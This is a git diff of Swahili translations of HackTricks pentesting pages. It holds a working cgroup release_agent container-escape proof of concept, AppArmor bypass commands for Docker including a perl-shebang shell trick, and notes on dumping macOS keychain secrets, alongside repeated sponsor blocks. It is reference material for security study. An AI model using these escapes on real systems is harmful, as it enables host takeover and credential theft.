Unaweza kisha **kutekeleza** wasifu mpya na
Unaweza kisha **kuimarisha** wasifu mpya na
```bash
sudo apparmor_parser -a /etc/apparmor.d/path.to.binary
```
@ -174,7 +174,7 @@ For more information, please see: https://wiki.ubuntu.com/DebuggingApparmor
```
## Apparmor katika Docker
Tafadhali kumbuka jinsi wasifu **docker-profile** wa docker unavyopakiwa kwa chaguo-msingi:
Tafadhali angalia jinsi wasifu **docker-profile** wa docker unavyopakiwa kwa chaguo-msingi:
```bash
sudo aa-status
apparmor module is loaded.
@ -197,7 +197,7 @@ Kwa chaguo-msingi **Profaili ya Apparmor ya docker-default** inatengenezwa kutok
- **Upatikanaji** wa mtandao wote
- **Uwezo wowote** haujatambuliwa (Hata hivyo, baadhi ya uwezo utatoka kwa kuingiza sheria za msingi kama vile #include \<abstractions/base>)
- **Kuandika** kwenye faili yoyote ya **/proc** **hairuhusiwi**
- **Vidirisha vingine**/**faili** vya /**proc** na /**sys** **vinakatazwa** upatikanaji wa kusoma/kuandika/kufunga/kuunganisha/kutekeleza
- **Vidirisha vingine**/**faili** vya /**proc** na /**sys** vinaruhusiwa kusoma/kuandika/kufunga/kuunganisha/kutekeleza
- **Kufunga** **hairuhusiwi**
- **Ptrace** inaweza kufanywa kwenye mchakato ambao umefungwa na **profaili ile ile ya apparmor**
@ -216,13 +216,13 @@ Unahitaji **kulemaza apparmor** ili kupita vizuizi vyake:
```bash
docker run -it --cap-add SYS_ADMIN --security-opt seccomp=unconfined --security-opt apparmor=unconfined ubuntu /bin/bash
```
Tafadhali kumbuka kwamba kwa chaguo-msingi **AppArmor** pia **itazuia kontena kufunga** folda kutoka ndani hata na uwezo wa SYS\_ADMIN.
Tafadhali kumbuka kwamba kwa chaguo-msingi **AppArmor** pia **itazuia kontena kufanya uwezo wa kufunga** folda kutoka ndani hata na uwezo wa SYS\_ADMIN.
Tafadhali kumbuka unaweza **kuongeza/kuondoa** **uwezo** kwa kontena ya docker (hii bado itazuiliwa na njia za ulinzi kama **AppArmor** na **Seccomp**):
- `--cap-add=SYS_ADMIN` inapeana uwezo wa `SYS_ADMIN`
- `--cap-add=ALL` inapeana uwezo wote
- `--cap-drop=ALL --cap-add=SYS_PTRACE` inaondoa uwezo wote na inapeana tu `SYS_PTRACE`
- `--cap-add=SYS_ADMIN` inatoa uwezo wa `SYS_ADMIN`
- `--cap-add=ALL` inatoa uwezo wote
- `--cap-drop=ALL --cap-add=SYS_PTRACE` inaondoa uwezo wote na kutoa tu `SYS_PTRACE`
{% hint style="info" %}
Kawaida, unapopata kwamba una **uwezo wa kipekee** uliopo **ndani** ya **kontena ya docker** lakini sehemu fulani ya **kudukua haifanyi kazi**, hii ni kwa sababu **apparmor ya docker itakuwa inazuia**.
@ -236,7 +236,7 @@ Ili kufafanua utendaji wa AppArmor, niliunda wasifu mpya wa Docker "mydocker" na
```
deny /etc/* w, # deny write for all files directly in /etc (not in a subdir)
```
Ili kuanzisha wasifu, tunahitaji kufanya yafuatayo:
Ili kuamsha wasifu, tunahitaji kufanya yafuatayo:
```
sudo apparmor_parser -r -W mydocker
```
@ -262,13 +262,15 @@ Kisha, unaweza kukimbia mstari ufuatao **kupata wasifu sahihi unao tumika**:
```bash
find /etc/apparmor.d/ -name "*lowpriv*" -maxdepth 1 2>/dev/null
```
### Kizuizi cha AppArmor Docker Bypass2
Katika kesi ya ajabu unaweza **kurekebisha wasifu wa apparmor wa docker na kuuweka upya.** Unaweza kuondoa vizuizi na "kuvuka" yao.
**AppArmor inategemea njia**, hii inamaanisha kwamba hata kama inaweza **kulinda** faili ndani ya saraka kama **`/proc`** ikiwa unaweza **kuweka jinsi kontena itakavyotekelezwa**, unaweza **kumount** saraka ya proc ya mwenyeji ndani ya **`/host/proc`** na **hakitakuwa chini ya ulinzi wa AppArmor tena**.
### Kuvuka AppArmor ya Docker2
### Kizuizi cha Shebang cha AppArmor
**AppArmor inategemea njia**, hii inamaanisha hata kama inaweza **kulinda** faili ndani ya saraka kama **`/proc`** ikiwa unaweza **kuweka jinsi kontena itakavyotekelezwa**, unaweza **kufunga** saraka ya proc ya mwenyeji ndani ya **`/mwenyeji/proc`** na **hakitakuwa tena kilinziwa na AppArmor**.
Katika [**kosa hili**](https://bugs.launchpad.net/apparmor/+bug/1911431) unaweza kuona mfano wa jinsi **hata kama unazuia perl kutumika na rasilimali fulani**, ikiwa tu unajenga script ya shell **ukiainisha** kwenye mstari wa kwanza **`#!/usr/bin/perl`** na **kutekeleza faili moja kwa moja**, utaweza kutekeleza chochote unachotaka. K.m.:
### Kuvuka Shebang ya AppArmor
Katika [**kosa hili**](https://bugs.launchpad.net/apparmor/+bug/1911431) unaweza kuona mfano wa jinsi **hata kama unazuia perl kutumika na rasilimali fulani**, ikiwa tu unajenga script ya shel **ukiainisha** kwenye mstari wa kwanza **`#!/usr/bin/perl`** na **utekelezi faili moja kwa moja**, utaweza kutekeleza chochote unachotaka. K.m.:
```perl
echo '#!/usr/bin/perl
use POSIX qw(strftime);
@ -278,9 +280,9 @@ exec "/bin/sh"' > /tmp/test.pl
chmod +x /tmp/test.pl
/tmp/test.pl
```
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) ni injini ya utaftaji inayotumia **dark-web** ambayo inatoa huduma za **bure** za kuangalia ikiwa kampuni au wateja wake wameathiriwa na **malware za kuiba**.
@ -297,9 +299,9 @@ Unaweza kutembelea tovuti yao na kujaribu injini yao kwa **bure** kwa:
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kuhack kwa kuwasilisha PRs kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* **Shiriki mbinu zako za kuhack kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>

View file

@ -7,18 +7,18 @@
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kuhack kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) ni injini ya utaftaji inayotumia **dark-web** ambayo inatoa huduma za **bure** za kuangalia ikiwa kampuni au wateja wake wame **vamiwa** na **malware za wizi**.
[**WhiteIntel**](https://whiteintel.io) ni injini ya utaftaji inayotumia **dark-web** ambayo inatoa huduma za **bure** za kuangalia ikiwa kampuni au wateja wake wameathiriwa na **malware za wizi**.
Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulio ya ransomware yanayotokana na malware za kuiba taarifa.
@ -38,23 +38,23 @@ t=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
touch /o; echo $t/c >$d/release_agent;echo "#!/bin/sh
$1 >$t/o" >/c;chmod +x /c;sh -c "echo 0 >$d/w/cgroup.procs";sleep 1;cat /o
```
Uthibitisho wa dhana (PoC) unaonyesha njia ya kutumia cgroups kwa kuunda faili ya `release_agent` na kuzindua wito wake kutekeleza amri za aina yoyote kwenye mwenyeji wa kontena. Hapa kuna maelezo ya hatua zinazohusika:
Uthibitisho wa dhana (PoC) unaonyesha njia ya kutumia cgroups kwa kuunda faili ya `release_agent` na kuzindua wito wake kutekeleza amri za aina yoyote kwenye mwenyeji wa kontena. Hapa kuna maelezo ya hatua zilizohusika:
1. **Andaa Mazingira:**
- Dhibiti `/tmp/cgrp` inaundwa kutumika kama kituo cha mlima kwa cgroup.
- Dhibiti `/tmp/cgrp` ili kutumika kama kituo cha mlima kwa cgroup.
- Msimamizi wa cgroup wa RDMA unamiminiwa kwenye saraka hii. Kwa kutokuwepo kwa msimamizi wa RDMA, inapendekezwa kutumia msimamizi wa cgroup wa `memory` kama mbadala.
```shell
mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x
```
2. **Wekeza Kikundi cha Mtoto (Child Cgroup):**
- Kikundi cha mtoto kinachoitwa "x" kinaundwa ndani ya saraka iliyomountiwa ya cgroup.
- Taarifa zinaanzishwa kwa kikundi cha "x" kwa kuandika 1 kwenye faili yake ya notify_on_release.
2. **Wekeza Kikundi cha Mtoto:**
- Kikundi cha mtoto kinachoitwa "x" kinaundwa ndani ya saraka iliyofungwa ya kikundi.
- Arifa zinaanzishwa kwa kikundi cha "x" kwa kuandika 1 kwenye faili yake ya notify_on_release.
```shell
echo 1 > /tmp/cgrp/x/notify_on_release
```
3. **Sanidi Msimamizi wa Kutolewa:**
- Njia ya chombo kwenye mwenyeji inapatikana kutoka faili ya /etc/mtab.
- Faili ya release_agent ya cgroup kisha inasanidiwa kutekeleza script iliyoitwa /cmd iliyoko kwenye njia ya mwenyeji iliyopatikana.
- Njia ya chombo kwenye mwenyeji inapatikana kutoka kwa faili ya /etc/mtab.
- Faili ya release_agent ya cgroup inasanidiwa kutekeleza script iliyoitwa /cmd iliyoko kwenye njia ya mwenyeji iliyopatikana.
```shell
host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
echo "$host_path/cmd" > /tmp/cgrp/release_agent
@ -68,17 +68,17 @@ chmod a+x /cmd
```
5. **Kuzindua Shambulizi:**
- Mchakato unaanzishwa ndani ya cgroup ya mtoto "x" na mara moja unakomeshwa.
- Hii inazindua `release_agent` (skripti ya /cmd), ambayo inatekeleza ps aux kwenye mwenyeji na kuandika matokeo kwa /output ndani ya kontena.
- Hii inazindua `release_agent` (hati ya /cmd), ambayo inatekeleza ps aux kwenye mwenyeji na kuandika matokeo kwa /output ndani ya kontena.
```shell
sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"
```
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) ni injini ya utaftaji inayotumia **dark-web** ambayo inatoa huduma za **bure** za kuangalia ikiwa kampuni au wateja wake wameathiriwa na **malware za wizi**.
[**WhiteIntel**](https://whiteintel.io) ni injini ya utaftaji inayotumia **dark-web** ambayo inatoa huduma za **bure** za kuangalia ikiwa kampuni au wateja wake wameathiriwa na **malware za kuiba**.
Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulio ya ransomware yanayotokana na malware za wizi wa habari.
Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulio ya ransomware yanayotokana na malware za kuiba taarifa.
Unaweza kutembelea tovuti yao na kujaribu injini yao kwa **bure** kwa:
@ -90,7 +90,7 @@ Unaweza kutembelea tovuti yao na kujaribu injini yao kwa **bure** kwa:
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA USAJILI**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**

View file

@ -14,13 +14,13 @@ Njia nyingine za kusaidia HackTricks:
</details>
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) ni injini ya utaftaji iliyochomwa na **dark-web** inayotoa **huduma za bure** za kuangalia ikiwa kampuni au wateja wake wameathiriwa na **malware za kuiba**.
[**WhiteIntel**](https://whiteintel.io) ni injini ya utaftaji inayotumia **dark-web** ambayo inatoa huduma za **bure** za kuangalia ikiwa kampuni au wateja wake wameathiriwa na **malware za wizi**.
Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulio ya ransomware yanayotokana na malware za kuiba taarifa.
Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulio ya ransomware yanayotokana na programu hasidi za kuiba habari.
Unaweza kutembelea tovuti yao na kujaribu injini yao **bure** kwa:
@ -31,17 +31,17 @@ Unaweza kutembelea tovuti yao na kujaribu injini yao **bure** kwa:
## Keychains Kuu
* **Keychain ya Mtumiaji** (`~/Library/Keychains/login.keycahin-db`), ambayo hutumika kuhifadhi **siri maalum za mtumiaji** kama nywila za programu, nywila za mtandao, vyeti vilivyoundwa na mtumiaji, nywila za mtandao, na funguo za umma/binafsi zilizoundwa na mtumiaji.
* **Keychain ya Mfumo** (`/Library/Keychains/System.keychain`), ambayo hifadhi **siri za mfumo nzima** kama nywila za WiFi, vyeti vya mizizi ya mfumo, funguo binafsi za mfumo, na nywila za programu za mfumo.
* **Keychain ya Mfumo** (`/Library/Keychains/System.keychain`), ambayo hifadhi **siri za mfumo nzima** kama nywila za WiFi, vyeti vya msingi vya mfumo, funguo binafsi za mfumo, na nywila za programu za mfumo.
### Upatikanaji wa Nywila za Keychain
Faili hizi, ingawa hazina ulinzi wa asili na zinaweza **kupakuliwa**, zimefichwa na zinahitaji **nywila ya wazi ya mtumiaji ili kufichuliwa**. Zana kama [**Chainbreaker**](https://github.com/n0fate/chainbreaker) inaweza kutumika kwa kufichua.
## Kinga ya Kuingia kwa Keychain
## Kinga ya Viingilio vya Keychain
### ACLs
Kila kuingia kwenye keychain inatawaliwa na **Orodha za Kudhibiti Upatikanaji (ACLs)** ambazo zinaamua ni nani anaweza kutekeleza vitendo mbalimbali kwenye kuingia kwenye keychain, ikiwa ni pamoja na:
Kila kuingilio katika keychain inatawaliwa na **Orodha za Kudhibiti Upatikanaji (ACLs)** ambazo zinaamua ni nani anaweza kutekeleza vitendo mbalimbali kwenye kuingilio cha keychain, ikiwa ni pamoja na:
* **ACLAuhtorizationExportClear**: Inaruhusu mmiliki kupata maandishi wazi ya siri.
* **ACLAuhtorizationExportWrapped**: Inaruhusu mmiliki kupata maandishi wazi yaliyofichwa na nywila nyingine iliyotolewa.
@ -50,32 +50,32 @@ Kila kuingia kwenye keychain inatawaliwa na **Orodha za Kudhibiti Upatikanaji (A
ACLs hizo zinaambatana na **orodha ya programu za kuaminika** ambazo zinaweza kutekeleza vitendo hivi bila kuulizwa. Hii inaweza kuwa:
* &#x20;**Hakuna** (hakuna idhini inayohitajika, **kila mtu anaaminika**)
* Orodha **tupu** (**hakuna mtu** anaaminika)
* Orodha **tupu** (hakuna mtu anaaminika)
* **Orodha** ya **programu maalum**.
Pia kuingia inaweza kuwa na ufunguo **`ACLAuthorizationPartitionID`,** ambao hutumiwa kutambua **teamid, apple,** na **cdhash.**
Pia kuingilio kinaweza kuwa na ufunguo **`ACLAuthorizationPartitionID`,** ambao hutumiwa kutambua **teamid, apple,** na **cdhash.**
* Ikiwa **teamid** imetajwa, basi ili **kupata thamani ya kuingia bila** **kuuliza**, programu iliyotumiwa lazima iwe na **teamid sawa**.
* Ikiwa **apple** imetajwa, basi programu inahitaji kuwa **imesainiwa** na **Apple**.
* Ikiwa **cdhash** imetajwa, basi programu lazima iwe na **cdhash** maalum.
* Ikiwa **teamid** imebainishwa, basi ili **kupata thamani ya kuingilio** bila **kuuliza**, programu iliyotumiwa lazima iwe na **teamid sawa**.
* Ikiwa **apple** imebainishwa, basi programu inahitaji kuwa **imesainiwa** na **Apple**.
* Ikiwa **cdhash** imeonyeshwa, basi programu lazima iwe na **cdhash** maalum.
### Kuunda Kuingia kwa Keychain
### Kuunda Kuingilio cha Keychain
Wakati kuingia **mgeni** **mgeni** anatumia **`Keychain Access.app`**, sheria zifuatazo zinatumika:
Wakati kuingilio **mpya** kinachoundwa kwa kutumia **`Keychain Access.app`**, sheria zifuatazo zinatumika:
* Programu zote zinaweza kufanya usimbaji.
* **Hakuna programu** inaweza kuuza/kufuli (bila kuuliza mtumiaji).
* Programu zote zinaweza kuona ukaguzi wa uadilifu.
* Hakuna programu inaweza kubadilisha ACLs.
* **PartitionID** imewekwa kama **`apple`**.
* **PartitionID** inawekwa kama **`apple`**.
Wakati **programu inaunda kuingia kwenye keychain**, sheria ni tofauti kidogo:
Wakati **programu inaunda kuingilio katika keychain**, sheria ni tofauti kidogo:
* Programu zote zinaweza kufanya usimbaji.
* Ni **programu inayounda** (au programu nyingine yoyote iliyowekwa wazi) inaweza kuuza/kufuli (bila kuuliza mtumiaji).
* Programu zote zinaweza kuona ukaguzi wa uadilifu.
* Hakuna programu inaweza kubadilisha ACLs.
* **PartitionID** imewekwa kama **`teamid:[teamID hapa]`**.
* **PartitionID** inawekwa kama **`teamid:[teamID hapa]`**.
## Kupata Keychain
@ -93,21 +93,21 @@ security set-generic-password-parition-list -s "test service" -a "test acount" -
### APIs
{% hint style="success" %}
**Uchambuzi na kudumpisha** kwa siri ambazo **hazitatoa ujumbe** unaweza kufanywa kwa kutumia chombo [**LockSmith**](https://github.com/its-a-feature/LockSmith)
**Uorodheshaji na kudondosha** siri za **keychain** ambazo **hazitazalisha ombi** linaweza kufanywa kwa kutumia chombo [**LockSmith**](https://github.com/its-a-feature/LockSmith)
{% endhint %}
Pata na **taarifa** kuhusu kila kuingia kwenye keychain:
* API ya **`SecItemCopyMatching`** hutoa taarifa kuhusu kila kuingia na kuna sifa unazoweza kuweka unapotumia:
* **`kSecReturnData`**: Ikiwa ni kweli, itajaribu kufichua data (weka kama uwongo kuepuka pop-ups)
* **`kSecReturnRef`**: Pata pia kumbukumbu ya kuingia kwenye keychain (weka kama kweli kwa kesi utaona unaweza kufichua bila pop-up)
* **`kSecReturnData`**: Ikiwa ni kweli, itajaribu kufichua data (weka kama uwongo ili kuepuka pop-ups)
* **`kSecReturnRef`**: Pata pia kumbukumbu ya kuingia kwenye keychain (weka kama kweli ikiwa baadaye unagundua unaweza kufichua bila pop-up)
* **`kSecReturnAttributes`**: Pata maelezo kuhusu kuingia
* **`kSecMatchLimit`**: Ni matokeo mangapi ya kurudi
* **`kSecClass`**: Aina gani ya kuingia kwenye keychain
Pata **ACLs** ya kila kuingia:
* Kwa API ya **`SecAccessCopyACLList`** unaweza kupata **ACL kwa kuingia kwenye keychain**, na itarudisha orodha ya ACLs (kama `ACLAuhtorizationExportClear` na zingine zilizotajwa awali) ambapo kila orodha ina:
* Kwa API ya **`SecAccessCopyACLList`** unaweza kupata **ACL kwa kuingia kwenye keychain**, na itarudi orodha ya ACLs (kama `ACLAuhtorizationExportClear` na zingine zilizotajwa hapo awali) ambapo kila orodha ina:
* Maelezo
* **Orodha ya Maombi Yaliyoaminika**. Hii inaweza kuwa:
* Programu: /Applications/Slack.app
@ -119,12 +119,12 @@ Ficha data:
* API ya **`SecKeychainItemCopyContent`** inapata maandishi wazi
* API ya **`SecItemExport`** inaexport funguo na vyeti lakini inaweza kuhitaji kuweka nywila kuuza yaliyomo yaliyofichwa
Na hizi ni **mahitaji** ya kuweza **kuexport siri bila ujumbe**:
Na hizi ni **mahitaji** ya kuweza **kuuza siri bila ombi**:
* Ikiwa kuna **programu 1 au zaidi** zilizoorodheshwa:
* Unahitaji **idhini sahihi** (**`Nil`**, au kuwa **sehemu** ya orodha iliyoruhusiwa ya programu katika idhini ya kupata taarifa za siri)
* Unahitaji sahihi ya msimbo kulingana na **PartitionID**
* Unahitaji sahihi ya msimbo kulingana na ile ya programu moja **iliyoaminika** (au kuwa mwanachama wa KeychainAccessGroup sahihi)
* Unahitaji sahihi ya msimbo kulingana na ile ya programu moja **iliyoaminika** (au kuwa mwanachama wa Kikundi sahihi cha KeychainAccessGroup)
* Ikiwa **programu zote zinaaminika**:
* Unahitaji **idhini sahihi**
* Unahitaji sahihi ya msimbo kulingana na **PartitionID**
@ -133,34 +133,34 @@ Na hizi ni **mahitaji** ya kuweza **kuexport siri bila ujumbe**:
{% hint style="danger" %}
Hivyo, ikiwa kuna **programu 1 iliyoorodheshwa**, unahitaji **kuingiza msimbo kwenye programu hiyo**.
Ikiwa **apple** imeonyeshwa katika **partitionID**, unaweza kupata kwa kutumia **`osascript`** kwa hivyo chochote kinachotumaini programu zote na apple katika partitionID. **`Python`** pia inaweza kutumika kwa hili.
Ikiwa **apple** imeonyeshwa kwenye **partitionID**, unaweza kufikia hiyo kwa kutumia **`osascript`** hivyo chochote kinachotumaini programu zote na apple kwenye partitionID. **`Python`** pia inaweza kutumika kwa hili.
{% endhint %}
### Sifa mbili za ziada
* **Isiyoweza kuonekana**: Ni bendera ya boolean ya **kuficha** kuingia kutoka kwa programu ya **UI** ya Keychain
* **Jumla**: Ni kuhifadhi **metadata** (kwa hivyo SIYOFICHWA)
* **Jumla**: Ni kuhifadhi **metadata** (kwa hivyo SIO IMEFICHWA)
* Microsoft ilikuwa inahifadhi katika maandishi wazi vitambulisho vyote vya upya kufikia mwisho wa nyeti.
## Marejeo
* [**#OBTS v5.0: "Lock Picking the macOS Keychain" - Cody Thomas**](https://www.youtube.com/watch?v=jKE1ZW33JpY)
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) ni injini ya utaftaji inayotumiwa na **dark-web** inayotoa huduma za **bure** kuchunguza ikiwa kampuni au wateja wake wameathiriwa na **malware za wizi**.
Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulio ya ransomware yanayotokana na malware za kuiba taarifa.
Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulio ya ransomware yanayotokana na malware za kuiba habari.
Unaweza kutembelea tovuti yao na kujaribu injini yao kwa **bure** kwa:
Unaweza kutembelea tovuti yao na kujaribu injini yao **bure** kwa:
{% embed url="https://whiteintel.io" %}
<details>
<summary><strong>Jifunze kuhusu kuvamia AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Njia nyingine za kusaidia HackTricks:
@ -168,6 +168,6 @@ Njia nyingine za kusaidia HackTricks:
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kuvamia kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>

View file

@ -2,7 +2,7 @@
<details>
<summary><strong>Jifunze AWS hacking kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Jifunze kuhusu udukuzi wa AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
Njia nyingine za kusaidia HackTricks:
@ -10,17 +10,17 @@ Njia nyingine za kusaidia HackTricks:
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kuhack kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* **Shiriki mbinu zako za udukuzi kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) ni injini ya utaftaji inayotumia **dark-web** ambayo inatoa **huduma za bure** za kuangalia ikiwa kampuni au wateja wake wameathiriwa na **malware za kuiba**.
[**WhiteIntel**](https://whiteintel.io) ni injini ya utaftaji inayotumia **dark-web** ambayo inatoa huduma za **bure** za kuangalia ikiwa kampuni au wateja wake wameathiriwa na **malware za wizi**.
Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulio ya ransomware yanayotokana na malware za kuiba taarifa.
Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulio ya ransomware yanayotokana na malware za wizi wa habari.
Unaweza kutembelea tovuti yao na kujaribu injini yao **bure** kwa:
@ -32,25 +32,25 @@ Unaweza kutembelea tovuti yao na kujaribu injini yao **bure** kwa:
### Faili za Kubadilishana
Faili za kubadilishana, kama vile `/private/var/vm/swapfile0`, hutumika kama **akiba wakati kumbukumbu ya kimwili imejaa**. Wakati hakuna nafasi zaidi katika kumbukumbu ya kimwili, data yake inahamishwa kwenye faili ya kubadilishana na kisha kurudishwa kwenye kumbukumbu ya kimwili kama inavyohitajika. Inaweza kuwepo faili nyingi za kubadilishana, zenye majina kama swapfile0, swapfile1, na kadhalika.
Faili za kubadilishana, kama vile `/private/var/vm/swapfile0`, hutumika kama **cache wakati kumbukumbu ya kimwili imejaa**. Wakati hakuna nafasi tena kwenye kumbukumbu ya kimwili, data yake inahamishwa kwenye faili ya kubadilishana na kisha kurudishwa kwenye kumbukumbu ya kimwili kama inavyohitajika. Inaweza kuwepo faili nyingi za kubadilishana, zenye majina kama swapfile0, swapfile1, na kadhalika.
### Picha ya Kulala
Faili iliyoko kwenye `/private/var/vm/sleepimage` ni muhimu wakati wa **hali ya kulala**. **Data kutoka kumbukumbu inahifadhiwa kwenye faili hii wakati OS X inalala**. Wakati wa kuamsha kompyuta, mfumo unapata data ya kumbukumbu kutoka kwenye faili hii, kuruhusu mtumiaji kuendelea pale walipoishia.
